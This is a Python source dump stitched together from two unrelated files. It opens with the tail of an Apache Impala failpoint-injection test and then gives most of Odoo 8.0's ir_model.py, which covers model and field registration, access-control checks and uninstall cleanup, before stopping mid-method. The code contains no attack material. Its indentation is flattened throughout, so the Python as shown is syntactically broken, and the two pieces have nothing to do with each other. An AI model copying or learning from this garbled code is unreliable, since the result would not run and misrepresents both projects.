# Maps plan node names to their respective node ids. Expects format of <ID>:<NAME>
node_id_map = defaultdict(list)
for row in explain_result.data:
match = re.search(r'\s*(?P<node_id>\d+)\:(?P<node_type>\S+\s*\S+)', row)
if match is not None:
node_id_map[match.group('node_type')].append(int(match.group('node_id')))
return node_id_map
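  # Illustrative example (EXPLAIN formatting assumed): a plan row such as
  # "02:HASH JOIN [INNER JOIN, BROADCAST]" is parsed by the regex above into
  # node_id=2 and node_type='HASH JOIN', so the returned map looks like
  # {'SCAN HDFS': [0, 1], 'HASH JOIN': [2], ...}.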
@classmethod
def add_test_dimensions(cls):
super(TestFailpoints, cls).add_test_dimensions()
    # Executing an explain on the test query will fail in an environment where hbase
    # tables don't exist (s3). Since this happens before the tests are run, the skipif
    # marker won't catch it. If 's3' is detected as a file system, return immediately.
if os.getenv("TARGET_FILESYSTEM") in ["s3", "isilon", "local"]: return
node_id_map = TestFailpoints.parse_plan_nodes_from_explain_output(QUERY, "functional")
assert node_id_map
cls.TestMatrix.add_dimension(TestDimension('location', *FAILPOINT_LOCATION))
cls.TestMatrix.add_dimension(TestDimension('target_node', *(node_id_map.items())))
cls.TestMatrix.add_dimension(TestDimension('action', *FAILPOINT_ACTION))
cls.TestMatrix.add_dimension(TestDimension('query_type', *QUERY_TYPE))
cls.TestMatrix.add_dimension(create_exec_option_dimension([0], [False], [0]))
# These are invalid test cases.
# For more info see IMPALA-55 and IMPALA-56.
cls.TestMatrix.add_constraint(lambda v: not (
v.get_value('action') == 'FAIL' and
v.get_value('location') in ['CLOSE'] and
v.get_value('target_node')[0] in ['AGGREGATE', 'HASH JOIN']) and
not (v.get_value('location') in ['PREPARE'] and
v.get_value('action') == 'CANCEL'))
# Don't create CLOSE:WAIT debug actions to avoid leaking plan fragments (there's no
# way to cancel a plan fragment once Close() has been called)
cls.TestMatrix.add_constraint(
lambda v: not (v.get_value('action') == 'CANCEL'
and v.get_value('location') == 'CLOSE'))
# No need to test error in scanner preparation for non-scan nodes.
cls.TestMatrix.add_constraint(
lambda v: (v.get_value('location') != 'PREPARE_SCANNER' or
v.get_value('target_node')[0] == 'SCAN HDFS'))
def test_failpoints(self, vector):
query = QUERY
node_type, node_ids = vector.get_value('target_node')
action = vector.get_value('action')
location = vector.get_value('location')
for node_id in node_ids:
debug_action = '%d:%s:%s' % (node_id, location,
'WAIT' if action == 'CANCEL' else 'FAIL')
      LOG.info('Current debug action: SET DEBUG_ACTION=%s' % debug_action)
vector.get_value('exec_option')['debug_action'] = debug_action
if action == 'CANCEL':
self.__execute_cancel_action(query, vector)
elif action == 'FAIL':
self.__execute_fail_action(query, vector)
else:
assert 0, 'Unknown action: %s' % action
# We should be able to execute the same query successfully when no failures are
# injected.
del vector.get_value('exec_option')['debug_action']
self.execute_query(query, vector.get_value('exec_option'))
def __execute_fail_action(self, query, vector):
try:
self.execute_query(query, vector.get_value('exec_option'),
table_format=vector.get_value('table_format'))
      assert False, 'Expected Failure'
except ImpalaBeeswaxException as e:
LOG.debug(e)
def __execute_cancel_action(self, query, vector):
LOG.info('Starting async query execution')
handle = self.execute_query_async(query, vector.get_value('exec_option'),
table_format=vector.get_value('table_format'))
LOG.info('Sleeping')
sleep(3)
cancel_result = self.client.cancel(handle)
self.client.close_query(handle)
assert cancel_result.status_code == 0,\
'Unexpected status code from cancel request: %s' % cancel_result
|
BT-astauder/odoo
|
refs/heads/8.0
|
openerp/addons/base/ir/ir_model.py
|
6
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2014 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from collections import defaultdict
import logging
import re
import time
import types
import openerp
from openerp import SUPERUSER_ID
from openerp import models, tools, api
from openerp.modules.registry import RegistryManager
from openerp.osv import fields, osv
from openerp.osv.orm import BaseModel, Model, MAGIC_COLUMNS, except_orm
from openerp.tools import config
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
MODULE_UNINSTALL_FLAG = '_force_unlink'
def _get_fields_type(self, cr, uid, context=None):
    # Avoid too many nested `if`s below, as RedHat's Python 2.6
    # breaks on it. See bug 939653.
return sorted([(k,k) for k,v in fields.__dict__.iteritems()
if type(v) == types.TypeType and \
issubclass(v, fields._column) and \
v != fields._column and \
not v._deprecated and \
not issubclass(v, fields.function)])
def _in_modules(self, cr, uid, ids, field_name, arg, context=None):
#pseudo-method used by fields.function in ir.model/ir.model.fields
module_pool = self.pool["ir.module.module"]
installed_module_ids = module_pool.search(cr, uid, [('state','=','installed')])
installed_module_names = module_pool.read(cr, uid, installed_module_ids, ['name'], context=context)
installed_modules = set(x['name'] for x in installed_module_names)
result = {}
xml_ids = osv.osv._get_xml_ids(self, cr, uid, ids)
for k,v in xml_ids.iteritems():
result[k] = ', '.join(sorted(installed_modules & set(xml_id.split('.')[0] for xml_id in v)))
return result
class unknown(models.AbstractModel):
"""
Abstract model used as a substitute for relational fields with an unknown
comodel.
"""
_name = '_unknown'
class ir_model(osv.osv):
_name = 'ir.model'
_description = "Models"
_order = 'model'
def _is_osv_memory(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids, context=context)
res = dict.fromkeys(ids)
for model in models:
if model.model in self.pool:
res[model.id] = self.pool[model.model].is_transient()
else:
_logger.error('Missing model %s' % (model.model, ))
return res
def _search_osv_memory(self, cr, uid, model, name, domain, context=None):
if not domain:
return []
__, operator, value = domain[0]
if operator not in ['=', '!=']:
raise osv.except_osv(_("Invalid Search Criteria"), _('The osv_memory field can only be compared with = and != operator.'))
value = bool(value) if operator == '=' else not bool(value)
all_model_ids = self.search(cr, uid, [], context=context)
is_osv_mem = self._is_osv_memory(cr, uid, all_model_ids, 'osv_memory', arg=None, context=context)
return [('id', 'in', [id for id in is_osv_mem if bool(is_osv_mem[id]) == value])]
def _view_ids(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids)
res = {}
for model in models:
res[model.id] = self.pool["ir.ui.view"].search(cr, uid, [('model', '=', model.model)])
return res
def _inherited_models(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for model in self.browse(cr, uid, ids, context=context):
res[model.id] = []
inherited_models = [model_name for model_name in self.pool[model.model]._inherits]
if inherited_models:
res[model.id] = self.search(cr, uid, [('model', 'in', inherited_models)], context=context)
return res
_columns = {
'name': fields.char('Model Description', translate=True, required=True),
'model': fields.char('Model', required=True, select=1),
'info': fields.text('Information'),
'field_id': fields.one2many('ir.model.fields', 'model_id', 'Fields', required=True, copy=True),
'inherited_model_ids': fields.function(_inherited_models, type="many2many", obj="ir.model", string="Inherited models",
help="The list of models that extends the current model."),
'state': fields.selection([('manual','Custom Object'),('base','Base Object')],'Type', readonly=True),
'access_ids': fields.one2many('ir.model.access', 'model_id', 'Access'),
'osv_memory': fields.function(_is_osv_memory, string='Transient Model', type='boolean',
fnct_search=_search_osv_memory,
help="This field specifies whether the model is transient or not (i.e. if records are automatically deleted from the database or not)"),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the object is defined or inherited'),
'view_ids': fields.function(_view_ids, type='one2many', obj='ir.ui.view', string='Views'),
}
_defaults = {
'model': 'x_',
'state': lambda self,cr,uid,ctx=None: (ctx and ctx.get('manual',False)) and 'manual' or 'base',
}
def _check_model_name(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context=context):
if model.state=='manual':
if not model.model.startswith('x_'):
return False
if not re.match('^[a-z_A-Z0-9.]+$',model.model):
return False
return True
def _model_name_msg(self, cr, uid, ids, context=None):
return _('The Object name must start with x_ and not contain any special character !')
_constraints = [
(_check_model_name, _model_name_msg, ['model']),
]
_sql_constraints = [
('obj_name_uniq', 'unique (model)', 'Each model must be unique!'),
]
# overridden to allow searching both on model name (model field)
# and model description (name field)
def _name_search(self, cr, uid, name='', args=None, operator='ilike', context=None, limit=100, name_get_uid=None):
if args is None:
args = []
domain = args + ['|', ('model', operator, name), ('name', operator, name)]
return self.name_get(cr, name_get_uid or uid,
super(ir_model, self).search(cr, uid, domain, limit=limit, context=context),
context=context)
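    # A minimal usage sketch (hypothetical cr/uid and search term): because
    # _name_search matches both the technical name and the description, a
    # call such as
    #   model_obj.name_search(cr, uid, 'partner', operator='ilike')
    # would match 'res.partner' through either field.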
def _drop_table(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context):
model_pool = self.pool[model.model]
cr.execute('select relkind from pg_class where relname=%s', (model_pool._table,))
result = cr.fetchone()
if result and result[0] == 'v':
                cr.execute('DROP VIEW %s' % (model_pool._table,))
elif result and result[0] == 'r':
cr.execute('DROP TABLE %s CASCADE' % (model_pool._table,))
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module tables
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG):
for model in self.browse(cr, user, ids, context):
if model.state != 'manual':
raise except_orm(_('Error'), _("Model '%s' contains module data and cannot be removed!") % (model.name,))
self._drop_table(cr, user, ids, context)
res = super(ir_model, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# only reload pool for normal unlink. For module uninstall the
# reload is done independently in openerp.modules.loading
cr.commit() # must be committed before reloading registry in new cursor
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context:
context = dict(context)
context.pop('__last_update', None)
# Filter out operations 4 link from field id, because openerp-web
# always write (4,id,False) even for non dirty items
if 'field_id' in vals:
vals['field_id'] = [op for op in vals['field_id'] if op[0] != 4]
return super(ir_model,self).write(cr, user, ids, vals, context)
def create(self, cr, user, vals, context=None):
if context is None:
context = {}
if context and context.get('manual'):
vals['state']='manual'
res = super(ir_model,self).create(cr, user, vals, context)
if vals.get('state','base')=='manual':
# add model in registry
self.instanciate(cr, user, vals['model'], context)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def instanciate(self, cr, user, model, context=None):
if isinstance(model, unicode):
model = model.encode('utf-8')
class CustomModel(models.Model):
_name = model
_module = False
_custom = True
CustomModel._build_model(self.pool, cr)
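        # Sketch: _build_model() registers the new class in the registry, so
        # a manual model named e.g. 'x_foo' becomes reachable as
        # self.pool['x_foo'] after the setup_models() call in create() above.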
class ir_model_fields(osv.osv):
_name = 'ir.model.fields'
_description = "Fields"
_rec_name = 'field_description'
_columns = {
'name': fields.char('Name', required=True, select=1),
'complete_name': fields.char('Complete Name', select=1),
'model': fields.char('Object Name', required=True, select=1,
help="The technical name of the model this field belongs to"),
'relation': fields.char('Object Relation',
help="For relationship fields, the technical name of the target model"),
'relation_field': fields.char('Relation Field',
help="For one2many fields, the field on the target model that implement the opposite many2one relationship"),
'model_id': fields.many2one('ir.model', 'Model', required=True, select=True, ondelete='cascade',
help="The model this field belongs to"),
'field_description': fields.char('Field Label', required=True),
'ttype': fields.selection(_get_fields_type, 'Field Type', required=True),
'selection': fields.char('Selection Options', help="List of options for a selection field, "
"specified as a Python expression defining a list of (key, label) pairs. "
"For example: [('blue','Blue'),('yellow','Yellow')]"),
'required': fields.boolean('Required'),
'readonly': fields.boolean('Readonly'),
'select_level': fields.selection([('0','Not Searchable'),('1','Always Searchable'),('2','Advanced Search (deprecated)')],'Searchable', required=True),
'translate': fields.boolean('Translatable', help="Whether values for this field can be translated (enables the translation mechanism for that field)"),
'size': fields.integer('Size'),
'state': fields.selection([('manual','Custom Field'),('base','Base Field')],'Type', required=True, readonly=True, select=1),
'on_delete': fields.selection([('cascade', 'Cascade'), ('set null', 'Set NULL'), ('restrict', 'Restrict')],
'On Delete', help='On delete property for many2one fields'),
'domain': fields.char('Domain', help="The optional domain to restrict possible values for relationship fields, "
"specified as a Python expression defining a list of triplets. "
"For example: [('color','=','red')]"),
'groups': fields.many2many('res.groups', 'ir_model_fields_group_rel', 'field_id', 'group_id', 'Groups'),
'selectable': fields.boolean('Selectable'),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the field is defined'),
'serialization_field_id': fields.many2one('ir.model.fields', 'Serialization Field', domain = "[('ttype','=','serialized')]",
ondelete='cascade', help="If set, this field will be stored in the sparse "
"structure of the serialization field, instead "
"of having its own database column. This cannot be "
"changed after creation."),
}
_rec_name='field_description'
_defaults = {
'selection': "",
'domain': "[]",
'name': 'x_',
'state': lambda self,cr,uid,ctx=None: (ctx and ctx.get('manual',False)) and 'manual' or 'base',
'on_delete': 'set null',
'select_level': '0',
'field_description': '',
'selectable': 1,
}
_order = "name"
def _check_selection(self, cr, uid, selection, context=None):
try:
selection_list = eval(selection)
except Exception:
_logger.warning('Invalid selection list definition for fields.selection', exc_info=True)
            raise except_orm(_('Error'),
                             _("The Selection Options expression is not a valid Python expression. "
                               "Please provide an expression in the [('key','Label'), ...] format."))
check = True
if not (isinstance(selection_list, list) and selection_list):
check = False
else:
for item in selection_list:
if not (isinstance(item, (tuple,list)) and len(item) == 2):
check = False
break
if not check:
raise except_orm(_('Error'),
_("The Selection Options expression is must be in the [('key','Label'), ...] format!"))
return True
def _size_gt_zero_msg(self, cr, user, ids, context=None):
        return _('Size of the field can never be less than 0!')
_sql_constraints = [
('size_gt_zero', 'CHECK (size>=0)',_size_gt_zero_msg ),
]
def _drop_column(self, cr, uid, ids, context=None):
for field in self.browse(cr, uid, ids, context):
if field.name in MAGIC_COLUMNS:
continue
model = self.pool[field.model]
cr.execute('select relkind from pg_class where relname=%s', (model._table,))
result = cr.fetchone()
cr.execute("SELECT column_name FROM information_schema.columns WHERE table_name ='%s' and column_name='%s'" %(model._table, field.name))
column_name = cr.fetchone()
if column_name and (result and result[0] == 'r'):
cr.execute('ALTER table "%s" DROP column "%s" cascade' % (model._table, field.name))
# remove m2m relation table for custom fields
# we consider the m2m relation is only one way as it's not possible
# to specify the relation table in the interface for custom fields
# TODO master: maybe use ir.model.relations for custom fields
if field.state == 'manual' and field.ttype == 'many2many':
rel_name = model._fields[field.name].relation
cr.execute('DROP table "%s"' % (rel_name))
model._pop_field(field.name)
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module columns
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG) and \
any(field.state != 'manual' for field in self.browse(cr, user, ids, context)):
raise except_orm(_('Error'), _("This column contains module data and cannot be removed!"))
self._drop_column(cr, user, ids, context)
res = super(ir_model_fields, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# The field we just deleted might have be inherited, and registry is
# inconsistent in this case; therefore we reload the registry.
cr.commit()
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def create(self, cr, user, vals, context=None):
if 'model_id' in vals:
model_data = self.pool['ir.model'].browse(cr, user, vals['model_id'])
vals['model'] = model_data.model
if context is None:
context = {}
if context and context.get('manual',False):
vals['state'] = 'manual'
if vals.get('ttype', False) == 'selection':
if not vals.get('selection',False):
raise except_orm(_('Error'), _('For selection fields, the Selection Options must be given!'))
self._check_selection(cr, user, vals['selection'], context=context)
res = super(ir_model_fields,self).create(cr, user, vals, context)
if vals.get('state','base') == 'manual':
if not vals['name'].startswith('x_'):
raise except_orm(_('Error'), _("Custom fields must have a name that starts with 'x_' !"))
if vals.get('relation',False) and not self.pool['ir.model'].search(cr, user, [('model','=',vals['relation'])]):
raise except_orm(_('Error'), _("Model %s does not exist!") % vals['relation'])
if vals['model'] in self.pool:
model = self.pool[vals['model']]
if vals['model'].startswith('x_') and vals['name'] == 'x_name':
model._rec_name = 'x_name'
if self.pool.fields_by_model is not None:
cr.execute('SELECT * FROM ir_model_fields WHERE id=%s', (res,))
self.pool.fields_by_model.setdefault(vals['model'], []).append(cr.dictfetchone())
# re-initialize model in registry
model.__init__(self.pool, cr)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context is None:
context = {}
if context and context.get('manual',False):
vals['state'] = 'manual'
#For the moment renaming a sparse field or changing the storing system is not allowed. This may be done later
if 'serialization_field_id' in vals or 'name' in vals:
for field in self.browse(cr, user, ids, context=context):
if 'serialization_field_id' in vals and field.serialization_field_id.id != vals['serialization_field_id']:
raise except_orm(_('Error!'), _('Changing the storing system for field "%s" is not allowed.')%field.name)
if field.serialization_field_id and (field.name != vals['name']):
raise except_orm(_('Error!'), _('Renaming sparse field "%s" is not allowed')%field.name)
# if set, *one* column can be renamed here
column_rename = None
# field patches {model: {field_name: {prop_name: prop_value, ...}, ...}, ...}
patches = defaultdict(lambda: defaultdict(dict))
# static table of properties
model_props = [ # (our-name, fields.prop, set_fn)
('field_description', 'string', tools.ustr),
('required', 'required', bool),
('readonly', 'readonly', bool),
('domain', 'domain', eval),
('size', 'size', int),
('on_delete', 'ondelete', str),
('translate', 'translate', bool),
('select_level', 'index', lambda x: bool(int(x))),
('selection', 'selection', eval),
]
if vals and ids:
checked_selection = False # need only check it once, so defer
for item in self.browse(cr, user, ids, context=context):
obj = self.pool.get(item.model)
field = getattr(obj, '_fields', {}).get(item.name)
if item.state != 'manual':
raise except_orm(_('Error!'),
_('Properties of base fields cannot be altered in this manner! '
'Please modify them through Python code, '
'preferably through a custom addon!'))
if item.ttype == 'selection' and 'selection' in vals \
and not checked_selection:
self._check_selection(cr, user, vals['selection'], context=context)
checked_selection = True
final_name = item.name
if 'name' in vals and vals['name'] != item.name:
# We need to rename the column
if column_rename:
raise except_orm(_('Error!'), _('Can only rename one column at a time!'))
if vals['name'] in obj._columns:
raise except_orm(_('Error!'), _('Cannot rename column to %s, because that column already exists!') % vals['name'])
if vals.get('state', 'base') == 'manual' and not vals['name'].startswith('x_'):
                        raise except_orm(_('Error!'), _('New column name must still start with x_, because it is a custom field!'))
if '\'' in vals['name'] or '"' in vals['name'] or ';' in vals['name']:
raise ValueError('Invalid character in column name')
column_rename = (obj, (obj._table, item.name, vals['name']))
final_name = vals['name']
if 'model_id' in vals and vals['model_id'] != item.model_id.id:
raise except_orm(_("Error!"), _("Changing the model of a field is forbidden!"))
if 'ttype' in vals and vals['ttype'] != item.ttype:
raise except_orm(_("Error!"), _("Changing the type of a column is not yet supported. "
"Please drop it and create it again!"))
# We don't check the 'state', because it might come from the context
# (thus be set for multiple fields) and will be ignored anyway.
if obj is not None and field is not None:
# find out which properties (per model) we need to update
for field_name, prop_name, func in model_props:
if field_name in vals:
prop_value = func(vals[field_name])
if getattr(field, prop_name) != prop_value:
patches[obj][final_name][prop_name] = prop_value
# These shall never be written (modified)
for column_name in ('model_id', 'model', 'state'):
if column_name in vals:
del vals[column_name]
res = super(ir_model_fields,self).write(cr, user, ids, vals, context=context)
if column_rename:
obj, rename = column_rename
cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s"' % rename)
# This is VERY risky, but let us have this feature:
# we want to change the key of field in obj._fields and obj._columns
field = obj._pop_field(rename[1])
obj._add_field(rename[2], field)
self.pool.setup_models(cr, partial=(not self.pool.ready))
if patches:
# We have to update _columns of the model(s) and then call their
# _auto_init to sync the db with the model. Hopefully, since write()
# was called earlier, they will be in-sync before the _auto_init.
# Anything we don't update in _columns now will be reset from
# the model into ir.model.fields (db).
ctx = dict(context,
select=vals.get('select_level', '0'),
update_custom_fields=True,
)
for obj, model_patches in patches.iteritems():
for field_name, field_patches in model_patches.iteritems():
# update field properties, and adapt corresponding column
field = obj._fields[field_name]
attrs = dict(field._attrs, **field_patches)
obj._add_field(field_name, field.new(**attrs))
# update database schema
self.pool.setup_models(cr, partial=(not self.pool.ready))
obj._auto_init(cr, ctx)
obj._auto_end(cr, ctx) # actually create FKs!
if column_rename or patches:
RegistryManager.signal_registry_change(cr.dbname)
return res
class ir_model_constraint(Model):
"""
This model tracks PostgreSQL foreign keys and constraints used by OpenERP
models.
"""
_name = 'ir.model.constraint'
_columns = {
'name': fields.char('Constraint', required=True, select=1,
help="PostgreSQL constraint or foreign key name."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'type': fields.char('Constraint Type', required=True, size=1, select=1,
help="Type of the constraint: `f` for a foreign key, "
"`u` for other constraints."),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)',
'Constraints with the same name are unique per module.'),
]
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL foreign keys and constraints tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
ids_set = set(ids)
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model.model
model_obj = self.pool[model]
name = openerp.tools.ustr(data.name)
typ = data.type
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_constraint where name=%s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
if typ == 'f':
# test if FK exists on this table (it could be on a related m2m table, in which case we ignore it)
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('f', name, model_obj._table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (model_obj._table, name),)
_logger.info('Dropped FK CONSTRAINT %s@%s', name, model)
if typ == 'u':
# test if constraint exists
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('u', name, model_obj._table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (model_obj._table, name),)
_logger.info('Dropped CONSTRAINT %s@%s', name, model)
self.unlink(cr, uid, ids, context)
class ir_model_relation(Model):
"""
This model tracks PostgreSQL tables used to implement OpenERP many2many
relations.
"""
_name = 'ir.model.relation'
_columns = {
'name': fields.char('Relation Name', required=True, select=1,
help="PostgreSQL table name implementing a many2many relation."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL many2many relations tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
ids_set = set(ids)
to_drop_table = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
name = openerp.tools.ustr(data.name)
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_relation where name = %s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
cr.execute("SELECT 1 FROM information_schema.tables WHERE table_name=%s", (name,))
            if cr.fetchone() and name not in to_drop_table:
to_drop_table.append(name)
self.unlink(cr, uid, ids, context)
# drop m2m relation tables
for table in to_drop_table:
cr.execute('DROP TABLE %s CASCADE'% table,)
_logger.info('Dropped table %s', table)
cr.commit()
class ir_model_access(osv.osv):
_name = 'ir.model.access'
_columns = {
'name': fields.char('Name', required=True, select=True),
        'active': fields.boolean('Active', help='If you uncheck the active field, it will disable the ACL without deleting it (if you delete a native ACL, it will be re-created when you reload the module).'),
'model_id': fields.many2one('ir.model', 'Object', required=True, domain=[('osv_memory','=', False)], select=True, ondelete='cascade'),
'group_id': fields.many2one('res.groups', 'Group', ondelete='cascade', select=True),
'perm_read': fields.boolean('Read Access'),
'perm_write': fields.boolean('Write Access'),
'perm_create': fields.boolean('Create Access'),
'perm_unlink': fields.boolean('Delete Access'),
}
_defaults = {
'active': True,
}
def check_groups(self, cr, uid, group):
grouparr = group.split('.')
if not grouparr:
return False
cr.execute("select 1 from res_groups_users_rel where uid=%s and gid IN (select res_id from ir_model_data where module=%s and name=%s)", (uid, grouparr[0], grouparr[1],))
return bool(cr.fetchone())
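    # Usage sketch (assuming the stock 'base.group_system' record exists):
    #   is_admin = access_obj.check_groups(cr, uid, 'base.group_system')
    # The argument must be a fully-qualified external id of the form
    # '<module>.<xml_id>', since it is split on the dot above.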
def check_group(self, cr, uid, model, mode, group_ids):
""" Check if a specific group has the access mode to the specified model"""
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
            model_name = model.model
else:
model_name = model
if isinstance(group_ids, (int, long)):
group_ids = [group_ids]
for group_id in group_ids:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id = %s", (model_name, group_id)
)
r = cr.fetchone()
if r is None:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id IS NULL", (model_name, )
)
r = cr.fetchone()
access = bool(r and r[0])
if access:
return True
# pass no groups -> no access
return False
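    # Sketch (hypothetical group ids): access is granted as soon as one of
    # the given groups, or the global (group_id IS NULL) rule, allows the
    # requested mode.
    #   ok = access_obj.check_group(cr, uid, 'res.partner', 'write', [gid1, gid2])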
def group_names_with_access(self, cr, model_name, access_mode):
"""Returns the names of visible groups which have been granted ``access_mode`` on
the model ``model_name``.
:rtype: list
"""
assert access_mode in ['read','write','create','unlink'], 'Invalid access mode: %s' % access_mode
cr.execute('''SELECT
c.name, g.name
FROM
ir_model_access a
JOIN ir_model m ON (a.model_id=m.id)
JOIN res_groups g ON (a.group_id=g.id)
LEFT JOIN ir_module_category c ON (c.id=g.category_id)
WHERE
m.model=%s AND
a.active IS True AND
a.perm_''' + access_mode, (model_name,))
return [('%s/%s' % x) if x[0] else x[1] for x in cr.fetchall()]
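    # Sketch (illustrative output): names are '<category>/<group>' when the
    # group has a category, otherwise just the group name, e.g.
    #   group_names_with_access(cr, 'res.partner', 'unlink')
    #   -> ['Administration/Settings', ...]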
@tools.ormcache()
def check(self, cr, uid, model, mode='read', raise_exception=True, context=None):
if uid==1:
            # The root user has all access rights
# TODO: exclude xml-rpc requests
return True
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.model
else:
model_name = model
# TransientModel records have no access rights, only an implicit access rule
if model_name not in self.pool:
_logger.error('Missing model %s' % (model_name, ))
elif self.pool[model_name].is_transient():
return True
# We check if a specific rule exists
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' JOIN res_groups_users_rel gu ON (gu.gid = a.group_id) '
' WHERE m.model = %s '
' AND gu.uid = %s '
' AND a.active IS True '
, (model_name, uid,)
)
r = cr.fetchone()[0]
if r is None:
# there is no specific rule. We check the generic rule
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' WHERE a.group_id IS NULL '
' AND m.model = %s '
' AND a.active IS True '
, (model_name,)
)
r = cr.fetchone()[0]
if not r and raise_exception:
groups = '\n\t'.join('- %s' % g for g in self.group_names_with_access(cr, model_name, mode))
msg_heads = {
# Messages are declared in extenso so they are properly exported in translation terms
'read': _("Sorry, you are not allowed to access this document."),
'write': _("Sorry, you are not allowed to modify this document."),
'create': _("Sorry, you are not allowed to create this kind of document."),
'unlink': _("Sorry, you are not allowed to delete this document."),
}
if groups:
msg_tail = _("Only users with the following access level are currently allowed to do that") + ":\n%s\n\n(" + _("Document model") + ": %s)"
msg_params = (groups, model_name)
else:
msg_tail = _("Please contact your system administrator if you think this is an error.") + "\n\n(" + _("Document model") + ": %s)"
msg_params = (model_name,)
_logger.warning('Access Denied by ACLs for operation: %s, uid: %s, model: %s', mode, uid, model_name)
msg = '%s %s' % (msg_heads[mode], msg_tail)
raise openerp.exceptions.AccessError(msg % msg_params)
return bool(r)
__cache_clearing_methods = []
def register_cache_clearing_method(self, model, method):
self.__cache_clearing_methods.append((model, method))
def unregister_cache_clearing_method(self, model, method):
try:
i = self.__cache_clearing_methods.index((model, method))
del self.__cache_clearing_methods[i]
except ValueError:
pass
def call_cache_clearing_methods(self, cr):
